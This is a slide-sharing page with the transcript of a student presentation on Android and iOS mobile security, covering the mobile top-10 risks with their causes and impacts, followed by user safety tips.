An Inside Look at Mobile Security Android & iOS Zachary Hance & Andrew Phifer Dr Harold Grossman.

Slides:



Advertisements
Similar presentations
OWASP Mobile Top 10 Beau Woods
Advertisements

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
OWASP Top 10 Mobile Risks Appsec USA Minneapolis, MN
1 GP Confidential © GlobalPlatform’s Value Proposition for Mobile Point of Sale (mPOS)
Parameter Tampering. Attacking the Ecommerce Shopping Cart In the above image we see that a user who wants to purchase a Television visits an online Store.
ATTACKING AUTHENTICATION The Web Application Hacker’s Handbook, Ch. 6 Presenter: Jie Huang 10/31/2012.
©2009 Justin C. Klein Keane PHP Code Auditing Session 4.3 – Information Disclosure & Authentication Bypass Justin C. Klein Keane
Latest Threats Against Mobile Devices Dave Jevans Founder, Chairman and CTO.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
PASSWORD MANAGER Why you need one 1. WHAT IS A PASSWORD MANAGER? A modern Password Manager is a browser extension (Chrome, Internet Explorer, Firefox,
Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Metro (down the Tube) Security Testing Windows Store Apps Marion McCune – ScotSTS Ltd.
OWASP Mobile Top 10 Why They Matter and What We Can Do
Telenet for Business Mobile & Security? Brice Mees Security Services Operations Manager.
Presentation By Deepak Katta
The Study of Security and Privacy in Mobile Applications Name: Liang Wei
Market Trends Enterprise Web Applications Cloud Computing SaaS Applications BYOD Data Compliance Regulations 30 Second Elevator Pitch Web browsers have.
LEVERAGING UICC WITH OPEN MOBILE API FOR SECURE APPLICATIONS AND SERVICES Ran Zhou 1 9/3/2015.
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.
Data Security.
OWASP Zed Attack Proxy Project Lead
MOBILE DEVICE SECURITY. WHAT IS MOBILE DEVICE SECURITY? Mobile Devices  Smartphones  Laptops  Tablets  USB Memory  Portable Media Player  Handheld.
Drupal Security Securing your Configuration Justin C. Klein Keane University of Pennsylvania School of Arts and Sciences Information Security and Unix.
Software Confidence. Achieved. Mobile Security and Payments Infrastructure 1 AJ Dexter Sr. Security Consultant.
Fall, Privacy&Security - Virginia Tech – Computer Science Click to edit Master title style Design Extensions to Google+ CS6204 Privacy and Security.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Internet of Things Top Ten. Agenda -Introduction -Misconception -Considerations -The OWASP Internet of Things Top 10 Project -The Top 10 Walkthrough.
School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.
Web Applications Testing By Jamie Rougvie Supported by.
Enforcing Cyber security in Mobile Applications – Public Sector Use Case SAPHINA MCHOME, VIOLA RUKIZA TANZANIA REVENUE AUTHORITY INFORMATION AND COMMUNICATION.
THE DEVIL IS IN THE (IMPLEMENTATION) DETAILS: AN EMPIRICAL ANALYSIS OF OAUTH SSO SYSTEMS SAN-TSAI SUN & KONSTANTIN BEZNOSOV PRESENTED BY: NAZISH KHAN COMPSCI.
Yair Grindlinger, CEO and Co-Founder Do you know who your employees are sharing their credentials with? Do they?
Lesson 19-E-Commerce Security Needs. Overview Understand e-commerce services. Understand the importance of availability. Implement client-side security.
Convenience product security Collin Busch. What is a convenience product? A convenience product is a device or application that makes your life easier.
SMARTPHONE FORENSICS 101 General Overview of Smartphone Investigations.
Wireless and Mobile Security
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
MobileSecurity Vulnerability Assessment Tools for the Enterprise Mobile Security Vulnerability Assessment Tools for the Enterprise Integrating Mobile/BYOD.
FriendFinder Location-aware social networking on mobile phones.
OWASP Building Secure Web Applications And the OWASP top 10 vulnerabilities.
How Your Customers Will Pay Online & by Phone
Engineering Secure Software. Agenda  What is IoT?  Security implications of IoT  IoT Attack Surface Areas  IoT Testing Guidelines  Top IoT Vulnerabilities.
Web Services Security Patterns Alex Mackman CM Group Ltd
Computer Security By Duncan Hall.
Copyright © The OWASP Foundation This work is available under the Creative Commons SA 2.5 license The OWASP Foundation OWASP Denver February 2012.
Web Application (In)security Note: Unless noted differently, all scanned figures were from the textbook, Stuttard & Pinto, 2011.
© 2015 IBM Corporation John Guidone Account Executive IBM Security IBM MaaS360.
ASP.NET 2.0 Security Alex Mackman CM Group Ltd
Do not try any of the techniques discussed in this presentation on a system you do not own. It is illegal and you will get caught.
Information Management System Ali Saeed Khan 29 th April, 2016.
James F. Fox MENA Cyber Security Practice Lead Presenters Cyber Security in a Mobile and “Always-on” World Booz | Allen | Hamilton.
The Fallacy Behind “There’s Nothing to Hide” Why End-to-End Encryption Is a Must in Today’s World.
Web Application Vulnerabilities
DATA SECURITY FOR MEDICAL RESEARCH
TOPIC: Web Security (Part-4)
Canberra OWASP Chapter meeting
Cyber Security for REDCap Extended Features Protecting REDCap extended features (Twilio, Mobile App, API, and more). – Staying ahead of the bad guys.
Secure Software Confidentiality Integrity Data Security Authentication
E-commerce Application Security
MOA Delta Mobile OA Installation Guide 2015/12/16.
Cybersecurity Awareness
HOW TO MAKE YOUR GMAIL ACCOUNT SECURE…. At Google, we take account security very seriously. To protect your account, we strongly recommend following the.
Information Security Awareness
WWW安全 國立暨南國際大學 資訊管理學系 陳彥錚.
Presentation transcript:

An Inside Look at Mobile Security Android & iOS Zachary Hance & Andrew Phifer Dr Harold Grossman

Introduction As of February 27 th, 2012, according to techcrunch.com, “Explosive growth. That’s Android. Google’s mobile platform is up 250 percent over last year and, according to Andy Rubin, SVP, Mobile and Digital Content, Google is seeing 850,000 activations every day.” According to dailymail.co.uk, “Apple’s total figure of 250 million activations of devices running iOS, including iPods, iPhones, and iPads. In November last year, Android was already standing at 200 million activations.”

Mobile Security Risks – Top 10 1.Insecure Data Storage 2.Weak Server Side Controls 3.Insufficient Transport Layer Protection 4.Client-Side Injection 5.Poor Authorization and Authentication 6.Improper Session Handling 7.Security Decisions via Untrusted Inputs 8.Side Channel Data Leakage 9.Broken Cryptography 10.Sensitive Information Disclosure

Insecure Data Storage Resulting from: -Not encrypting data -Caching data not intended for long-term storage -Weak or global permissions -Not leveraging platform best- practices Impacts from this attack: -Confidentiality of data lost -Credentials disclosed -Privacy violations -Non-compliance

Weak Server Side Controls Resulting from: -Not being able to trust the client (can’t always assume) -Applies to the backend services Impacts from this attack: -Confidentially of data lost -Integrity of data not trusted

Insufficient Transport Layer Protection Resulting from: - Complete lack of encryption for transmitted data -Weakly encrypted data in transit -Strong encryption, but ignoring security warnings -Ignoring certificate validation errors and falling back to plain text Impacts from this attack: -Man-in-middle gets access to data -Tampering with data -Confidentiality of data is lost

Client Side Injection Resulting from: -Apps using browser libraries -HTML and SQL injections Impacts from this attack: -Device is compromised -Toll fraud -Privilege escalation

Poor Authorization and Authentication Resulting from: -Relying on immutable values to authenticate a user’s device Impacts: -Privilege escalation -Unauthorized access

Improper Session Handling Resulting from: Mobile apps running for long periods of time and the ways they maintain sessions (ex. HTTP cookies, OAuth tokens, and SSO authentication devices) Impacts Privilege escalation Unauthorized access Circumvent licensing and payments

Security Decisions Via Untrusted Inputs Resulting from Mobile devices being taken advantage of to bypass permissions and security models Main attack sources Malicious apps Client side injection Impacts Consuming paid resources Data exfiltration Privilege escalation

Side Channel Data Leakage Resulting from Mix of not disabling platform features and programmatic flaws that causes sensitive data to be in unintended places (web caches, keystroke logging, screenshots, logs, and temp directories) Impacts Data retained indefinitely Privacy violations

Broken Cryptography Resulting from Broken implementations using strong cryptography libraries Custom, easily defeated cryptography implementations Impacts Confidentiality of data lost Privilege escalation Circumvent business logic

Sensitive Information Disclosure Resulting from Apps are reversed engineered easily, code obfuscation Impacts Credentials disclosed Intellectual property exposed Ex. API keys, passwords, sensitive business logic

Which mobile OS is more secure? -Collectively, the mobile OS is more secure than the computer OS. -However, the tide is beginning to turn for more malware being developed for mobile OS.

Conflict of Interest -Mobile devices do not allow users complete control over their devices. -Most users root or jailbreak their devices using the same vulnerabilities malware is developed for. -This conflict of interest between vulnerability disclosure and the ability for people to fully control their own device poses a great security issue.

Interesting Stats

Tips For Generally Keeping Safe 1) Only download apps from trusted sources, such as reputable app stores and download sites. Remember to look at the developer name, reviews, and star ratings. 2) After clicking on a web link, pay close attention to the address to make sure it matches the website it claims to be if you are asked to enter account or login information. 3) Set a password on your mobile device so that if it is lost or stolen, your data is difficult to access. 4) Download a mobile security tool that scans every app you download for malware and spyware and can help you locate a lost or stolen device. For extra protection, make sure your security app can also protect from unsafe websites. 5) Be alert for unusual behaviors on your phone, which could be a sign that it is infected. These behaviors may include unusual text messages, strange charges to the phone bill, and suddenly decreased battery life. 6) Make sure to download firmware updates as soon as they are available for your device.

In Summary -The top ten threats are not the only threats. -Threats are grouped in application-based, web-based, network-based, and physical groupings. -Mobile devices are being increasingly targeted for malware. -Staying up to date on trends seen in mobile security will be the best chance at keeping your device clean. -Mobile security is equally important for both the Developer And End-User.

Resources secure/ biw=944&bih=950&tbm=isch&tbnid=jpwbVi42K7WRSM:&imgrefurl= newgadget.org/technology/apple-ios-vs-google-android-which-one-is- better/&docid=yBXTR8AlMGbqEM&imgurl= m/wp-content/uploads/2010/09/apple-logo.jpg&w=450&h=370&ei=PUaTT--0I- fe2AWvvpHzBA&zoom=1&iact=hc&vpx=651&vpy=290&dur=1968&hovh=204& hovw=248&tx=155&ty=121&sig= &sqi=2&page=1&tb nh=140&tbnw=157&start=0&ndsp=24&ved=1t:429,r:8,s:0,i: schemes-apples-ios/